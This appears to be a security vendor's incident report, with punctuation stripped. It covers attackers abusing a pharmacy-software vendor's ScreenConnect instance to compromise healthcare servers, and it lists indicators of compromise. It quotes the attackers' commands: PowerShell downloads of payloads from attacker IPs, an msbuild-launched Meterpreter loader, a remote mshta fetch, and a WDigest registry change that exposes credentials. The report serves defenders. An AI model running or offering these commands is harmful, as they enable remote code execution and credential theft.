Bitter Pill ThirdParty Pharmaceutical Vendor Linked to Pharmacy and Health Clinic Cyberattack
pSee The Huntress Managed Security Platform in ActionppAsk questions explore the dashboard and moreppBook a demo ppSee The Huntress Managed Security Platform in ActionppAsk questions explore the dashboard and moreppBook a demo ppIn a concerning development within the healthcare sector Huntress has identified a series of unauthorized access that signifies internal reconnaissance and preparation for additional threat actor activity against multiple healthcare organizations ppThe attackers abused a locally hosted instance of a widelyused remote access tool ScreenConnectutilized by the company Transaction Data Systems which recently merged with and was renamed Outcomes the makers of Rx30 and ComputerRx software for initial access to victim organizations The threat actor proceeded to take several steps including installing additional remote access tools such as ScreenConnect or AnyDesk instances to ensure persistent access to the environmentsppppIn this article there are multiple ScreenConnect instances at play there are a total of four instances observed across two endpoints from completely distinct organizations ie not the same company not managed by the same MSP geographically separated etc One of those ScreenConnect instances appeared and was used by the threat actor on both endpoints ppThere were similarities in tactics techniques and procedures TTPs across both endpoints as well as multiple intersections in indicators of compromise IOCs Specifically one ScreenConnect instance instance B was observed being actively used on both endpoints the redacted 1 account was observed being used to access both endpoints via ScreenConnect and the file testxml was downloaded to both endpoints via PowerShellppEndpoint 1 is a Windows Server 2019 Standard system within an infrastructure in the pharmaceutical field Log data allowed the Huntress team to see as far back as August 9 2023 where the team observed ScreenConnect instance A being accessed via an account named redacted 1 There were repeated Connected and Disconnected messages for the account until the file ConnectWiseControlClientSetupmsi was downloaded and launched installing ScreenConnect instance B on the endpoint Then beginning on August 10 2023 the redacted 1 account was used to access the endpoint via ScreenConnect instance B There were several pairs of Connected and Disconnected messages in the logs for the redacted 1 account until October 28 2023ppOn October 28 the redacted 2 account was used to access ScreenConnect instance B and run the following PowerShell commandpppowershell command NewObject NetWebClientDownloadFilehttp257149103amsi CUsersAdministratorDocumentsamsi ppThe amsi file was launched via MsiExecexe installing ScreenConnect instance C on the endpoint connecting to IP address 4566230146 via port 8041 Shortly after the installation completed the redacted 2 account disconnected from ScreenConnect instance BppTwo days later on October 30 ScreenConnect instance C was used to run the following PowerShell commandpppowershell Command wc NewObject SystemNetWebClient wcDownloadFilehttp11991138133443testxml cprogramdatatestxmlppAlmost 20 hours later on October 31 ScreenConnect instance B was used to run the following commandppCwindowsMicrosoftNETFrameworkv4030319msbuildexe CprogramdatatestxmlppThe payload testxml consists of C code forking the publicly available nps project for detection evasion and process execution As designed the payload attempts to load a Metasploit Meterpreter instance in memory but antimalware protections on the system identified and attempted to terminate execution However this does not appear to have succeeded as additional processes were observed being launched via the Printer Spooler service spoolsvexe For example the following processes were observed being runppnslookup myipopendnscom Resolver1opendnscompppowershell command ImportModule ActiveDirectoryGetADComputer Filter Properties Sort IPv4Address FT Name ipv4 oper LastLogonDate AutosizeppCWindowssystem32cmdexe S D c type CWindowsSystem32mimilsalog findstr V MailboxppEndpoint 2 is also a Windows Server 2019 Standard system within an infrastructure in the healthcare field Log data illustrates that ScreenConnect instance B the same instance B observed on endpoint 1 was installed and actively being connected to via the redacted 1 account as of November 8 2022 On November 1 2023 the file smsi was transferred to the endpoint via the ScreenConnect instance launching this file led to ScreenConnect instance D being installed on this endpoint with the instance configured to connect to 185124598 on port 8041ppIt was clear that ScreenConnect instance B was still running and accessible on the endpoint on November 5 2023 an error message indicated that the instance attempted to connect to the configured endpoint and a DNS Client message was observed indicating that the configured endpoint could not be resolvedppOn November 6 the following PowerShell command was run via ScreenConnect instance Dpppowershell Command wc NewObject SystemNetWebClient wcDownloadFilehttp11991138133443testxml cprogramdatatestxmlppThe use of msbuildexe to compile the file and launch the payload was not observed on this endpoint However four hours later the following PowerShell command was run also via ScreenConnect instance Dpppowershell Command wc NewObject SystemNetWebClient wcDownloadFilehttpsbashuploadcomPXYpfamsi cprogramdataamsippThis file was launched via msiexecexe installing the AnyDeskMSI Service However about a minute and a half after being launched this service was stopped via taskkillexe ppApproximately four hours later the threat actor made multiple attempts to create the manager user account and add the account to the local Administrator group on the endpoint Once their efforts were successful the threat actor logged out then logged back into ScreenConnect instance D via the newly created account and then used that instance to transfer and launch the file AdvancedIPScanner2545941exe Finally the threat actor was observed running the following commandsppmshta http1199113813399995E1Chpptaskkill F IM mshtaexeppreg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest v UseLogonCredential t REGDWORD d 1 fppScreenConnect instance B found on both endpoints and accessed via the redacted 1 account per the userconfig file retrieved from one of the endpoints monitored via Huntress is tied to rstdsclinicalcom ppThe observed domain is legitimate and associated with Transaction Data Systems now named Outcomes At this time Huntress cannot identify whether Transaction Data Systems itself has been breached if credentials for a legitimate Transaction Data Systemsassociated employee or user have been leaked or if some other mechanism was involved tying their remote management of these clients to subsequent threat actor abuseppHuntress has identified and urges immediate action upon the following IoCsppIP AddressppHosting ProviderppHosting LocationppFunctionpp11991138133ppTencent Computer SystemsppCNppPrimary infrastructure for storing and retrieving postaccess payloadspp185124598ppPrivate Layer IncppPAppConnecting server associated with malicious ScreenConnect instance Dpp4566230146ppDelis LLCppNLppConnecting server associated with malicious ScreenConnect instance Cpp257149103ppRed Byte LLCppPLppHosting server for AnyDesk MSI installationppNameppSHA256ppFunctionpptestxmlpp9f42bf3a61faaab8f86abb3c7f9db417bffb3474a55169a4efb1d2386545e4e8ppC payload designed to load Meterpreter into victim memoryppamsipp70f865a7f8a01356685b17abdf6ac738e9a9098f1ae2d5a34cfa3610cb28fc56ppAnyDesk MSI installerppsmsipp8c3b4febe58df0a01126d78109f52035d34a4e03f02b5d4fca3e4d94f3f657b3ppScreenConnect MSI installerppScreenConnect Instance IDppDescriptionppadf02e34cba839d2ppScreenConnect instance ID B associated with rstdsclinicalcom ppe3e2410d655306ffppScreenConnect instance ID C associated with 4566230146pp4974c38508ef2b18ppScreenConnect instance ID D associated with 185124598ppCprogramdataamsippCprogramdatatestxmlppCUsersAdministratorDocumentsamsippSmsippCUsersmanagerDocumentsConnectWiseControlFilesAdvancedIPScanner2545941exeppCProgram Files x86ScreenConnect Client unique identifierScreenConnectClientServiceexeppWhile researching this event Huntress analysts identified an open directory on 257149103 shown in the following figureppppIn addition to amsi the AnyDesk installer previously discussed two additional files were locatedppThe IP in question appears to be a tool repository for threat actors although the lack of observations on bmsi and payloads in tzip in monitored environments makes its association with the ScreenConnect incidents uncertain However the payloads in question match overall observed behaviors in terms of remote access tool installation bmsi and payloads associated with system survey masscan64exe and data capture WinPcap413exe The outlier is veeamexe as all other observed activity indicates a combination of credential capture or reuse with livingofftheland techniques or abuse of legitimate softwareppPharmacies and other healthcare organizations that may be clients of Transaction Data SystemsOutcomes should immediately examine their systems and networks for the above IoCs Any discovery of these should be taken seriously and investigated promptly Given the potential implications of such a breach in the healthcare industry particularly regarding patient data privacy and availability of critical services a comprehensive response is essentialppIts imperative for organizations within the healthcare domain to recognize the gravity of such intrusions and take concerted steps to safeguard their infrastructure Enhanced endpoint monitoring robust cybersecurity frameworks and proactive threat hunting are no longer optional but a necessity in the face of such sophisticated cyber threatsppIn our effort to respond responsibly to this situation we have made several attempts through various channels to contact Transaction Data Systems now Outcomes to communicate our findings and offer support in addressing these incidents We have not yet been able to engage with their teamppWe remain open and ready to collaborate for the safety and security of all parties involvedppHackers are constantly evolving to better attack small and midsize businessesHuntress is how SMBs and managed service providers stay ahead with managed cybersecurity solutions for endpoints email and identityp